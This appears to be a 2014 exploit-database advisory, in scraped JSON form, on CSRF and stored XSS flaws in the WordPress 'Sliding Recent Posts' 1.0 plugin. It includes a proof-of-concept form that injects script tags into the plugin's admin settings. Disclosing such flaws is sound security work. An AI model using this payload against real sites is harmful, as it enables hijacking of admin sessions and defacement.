WordPress Sliding Recent Posts 1.0 CSRF / XSS

2014-12-12T00:00:00

Description

{"id": "PACKETSTORM:129504", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "WordPress Sliding Recent Posts 1.0 CSRF / XSS", "description": "", "published": "2014-12-12T00:00:00", "modified": "2014-12-12T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/129504/WordPress-Sliding-Recent-Posts-1.0-CSRF-XSS.html", "reporter": "Morten Nortoft", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2016-11-03T10:15:55", "viewCount": 13, "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "_state": {"dependencies": 1678911500, "score": 1678911848, "epss": 1678917342}, "_internal": {"score_hash": "5979e41841e68da7c0ae743ec7f773f3"}, "sourceHref": "https://packetstormsecurity.com/files/download/129504/wpsrp-xsrfxss.txt", "sourceData": "`Title: WordPress 'Sliding Recent Posts' plugin - CSRF/XSS \nVersion: 1.0 \nAuthor: Morten N\u00f8rtoft, Kenneth Jepsen, Mikkel Vej \nDate: 2014/12/12 \nDownload: https://wordpress.org/plugins/sliding-recent-posts/ \nNotified WordPress: 2014/11/27 \n---------------------------------------------------------------- \n \n## Description: \n---------------------------------------------------------------- \nThis plugin displays a widget on your site that will slide into the screen when you click on it and it will display a list of recent posts with thumbnails \n \n## CSRF: \n---------------------------------------------------------------- \nIt is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page. \n \n \n## Stored XSS: \n---------------------------------------------------------------- \nSettings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields. \n \nPoC: \nLog in as admin and then submit the following form. \n<form method=\"POST\" action=\"http://[DOMAIN]/wp-admin/admin.php?page=sliding-recent-posts.php\"> \n<input type=\"text\" name=\"num_posts\" value=\"3\"><br /> \n<input type=\"text\" name=\"position\" value=\"\"><script>alert(1)</script>\"><br /> \n<input type=\"text\" name=\"background_color\" value=\"#798746\"/><script>alert(2)</script>\"><br /> \n<input type=\"text\" name=\"font_color\" value=\"#ffffff\"><br /> \n<input type=\"text\" name=\"ll__opt[disable]\" value=\"Save\"><br /> \n<input type=\"text\" name=\"srp_save\" value=\"save\"><br /> \n<input type=\"submit\"> \n</form> \n \n \n## Solution \n---------------------------------------------------------------- \nNo fix have been released. \n \nWordPress have been notified and the plugin has been closed until it is updated. \n`\n"}